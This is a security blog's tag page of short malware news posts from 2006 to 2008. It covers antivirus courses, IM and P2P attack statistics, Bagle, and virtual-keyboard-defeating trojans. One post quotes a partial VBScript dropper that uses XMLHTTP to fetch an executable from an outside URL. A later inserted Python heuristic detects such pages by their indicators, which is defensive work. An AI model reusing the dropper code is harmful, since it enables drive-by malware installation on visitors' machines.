Of Spam & Men


Tag - malware


Monday 28 January 2008

Studying Malware Analysis In College

F-Secure is about to start a course called "Malware Analysis and Antivirus Technologies" at the Helsinki University of Technology. I really wish we had had classes like that when I was in college!

And since F-Secure is full of cool people, they publish the slides from the lectures that have already been given!

On the menu:

  • General introduction of the course [slides]
  • Fighting Online Crime [slides]
  • Windows operating system: Antivirus perspective.
  • Legal aspects of reverse engineering. Reverse engineering I
  • Reverse engineering II
  • Reverse engineering tools hands on classes
  • Mobile malware.
  • Using debuggers to analyze malware
  • Emulators and disassemblers. Behavioral analysis of malware.
  • Reverse engineering III
  • Unpacking and decrypting malware
  • Antivirus engine design.

From F-Secure

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers differ slightly from Netcraft's, but they give a reasonable explanation for the gap. According to Google, IIS and Apache each account for the same share of malware-distributing web servers overall.

Interesting facts: in the US, 80% of malware is served by Apache; in China, 95% by IIS...

From Google Online Security Blog

Monday 23 July 2007

Chat^WTroll with malware authors

CastleCops.com is a popular site that provides information to support computer security education. Its forums are particularly useful when you think something fishy is going on, and a lot of very well-informed people participate there.

Recently a thread about rogue domains used by the (nasty) Zlob malware was posted, and the malware author showed up to explain that his little creation wasn't malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

facetime: IM & P2P attacks on the rise

Facetime Security Labs, a research lab focused on IM security, recently reported that IM and P2P attacks are on the rise: a 5% increase in incidents targeting public IM and P2P channels in Q2 2007 compared to Q1 2007. For comparison, the same period in 2006 saw a 35% decrease.

The SpywareGuide Greynets Blog summarizes:

From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN and AOL) dropped from 74 total incidents in the first period to 64 in the second quarter. Attacks spread via AOL dropped by more than half (from 28 incidents to 13). Overall, the MSN network accounted for 50 percent of the attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20 percent.

As we predicted earlier this year, attacks spread via Internet Relay Chat (IRC) continue to account for a growing percentage of all attacks. In fact, the percentage of attacks that are IRC-based has risen in each of the last six quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the current quarter.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock


Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: what if he bought an AdWords ad telling people to visit his blog to get infected with malware? His ad read "Is your PC virus-free? Get it infected here!" and it ran for 6 months. Of course, clicking on the link would not infect the visitor's computer, but it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? Well, I guess people don't read. How many people surf through Google thinking that AdWords ads are actually search results from Google?

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Wednesday 3 January 2007

Research: IM Malware Attacks on the Rise

According to a new research report produced by security software maker Akonix Systems, in San Diego, experts at the company unearthed some 406 new IM-borne threats over the last 12 months, compared with 347 attacks tracked by the company in 2005.

In 2004 the company's security analysts discovered just under 50 attacks that were carried out either via IM or peer-to-peer technologies.

However, attacks delivered via P2P networks appear to be falling in popularity, as Akonix researchers recorded an 11 percent decrease in that type of threat during December 2006, with only 16 such attacks reported for the month. Akonix traditionally reports its research of IM and P2P threats simultaneously.

Continue reading...

Monday 4 December 2006

Bagle Returns

Several antivirus and security companies are reporting that Bagle is back in business.

Indeed, F-Secure reports that some of the old Bagle update URLs were activated on Nov. 30th.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards


More and more banks are replacing the usual username/password form with a virtual keyboard. The sole purpose of this method is to defeat keyloggers.

Unfortunately for them, more and more malware also defeats the purpose of virtual keyboards. The guys at VirusTotal analyzed a new trojan that takes a series of small screen captures of the area around the mouse cursor. It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Thursday 23 November 2006

Malware 2.0: Malware utilizes AJAX to install itself

Well, OK, it's not really AJAX. This malware uses a bit of HTML with XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antivirus engines and you get W32/new-malware!Maximus on your hard drive:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")

Continue reading...
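The snippet above is a typical HTML dropper: a VBScript block, error suppression, an ActiveX classid (the one shown in the snippet), an XMLHTTP object created from script, and a URL ending in .exe. As an added example (not code from the original post or from the malware author), here is a small Python heuristic that pulls every script block out of a page and reports which of those indicators it finds. The sample pages are constructed for the demo, the payload URL is a placeholder, and the "adodb.stream" indicator is an assumption based on how such droppers usually write the fetched bytes to disk rather than on this particular sample.

```python
import re
from html.parser import HTMLParser

# classid quoted in the dropper snippet above
RDS_DATASPACE_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"
# URL pointing at a downloadable executable (extension list is an assumption)
EXE_URL_RE = re.compile(r"https?://[^\s\"'<>]+\.(?:exe|scr|dll|bat)\b", re.IGNORECASE)


class ScriptExtractor(HTMLParser):
    """Collect (language attribute, body) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of (language, body) tuples
        self._current = None   # script currently being read, or None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            lang = {k.lower(): (v or "") for k, v in attrs}.get("language", "")
            self._current = [lang.lower(), ""]

    def handle_data(self, data):
        # HTMLParser delivers script content through handle_data
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(tuple(self._current))
            self._current = None


def score_page(html):
    """Return the sorted list of dropper indicators found in the page's scripts."""
    parser = ScriptExtractor()
    parser.feed(html)
    parser.close()
    found = set()
    for lang, body in parser.scripts:
        low = body.lower()
        if "vbscript" in lang:
            found.add("vbscript_block")
        if "on error resume next" in low:
            found.add("error_suppression")
        if RDS_DATASPACE_CLSID.lower() in low:
            found.add("rds_dataspace_classid")
        if "microsoft.xmlhttp" in low:
            found.add("xmlhttp_from_script")
        if "adodb.stream" in low:          # assumed companion indicator
            found.add("adodb_stream")
        if EXE_URL_RE.search(body):
            found.add("remote_executable_url")
    return sorted(found)


def is_suspicious(html, threshold=3):
    """Flag a page on three or more indicators, or on classid + executable URL."""
    hits = set(score_page(html))
    return len(hits) >= threshold or {"rds_dataspace_classid", "remote_executable_url"} <= hits


# Constructed sample mirroring the dropper's structure (placeholder URL, not the real one)
SAMPLE_DROPPER = """<html><head><title></title></head><body>
<script language="VBScript">
on error resume next
dl = "http://example.invalid/payload.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
</script></body></html>"""

# Constructed benign page: ordinary XMLHttpRequest use in JavaScript
SAMPLE_BENIGN = """<html><body><script language="JavaScript">
var xhr = new XMLHttpRequest(); xhr.open("GET", "/api/status.json"); xhr.send();
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(name, score_page(page), "suspicious" if is_suspicious(page) else "clean")
```

The point of the threshold is that no single indicator is damning on its own: legitimate intranet pages use VBScript and XMLHTTP, and plenty of pages link to an .exe. It is the combination, especially the known-bad classid next to an executable URL, that separates a dropper from ordinary content.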

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a piece of malware. Their case study is a very complete and interesting analysis of a yet-to-be-named malware sample (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group. The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...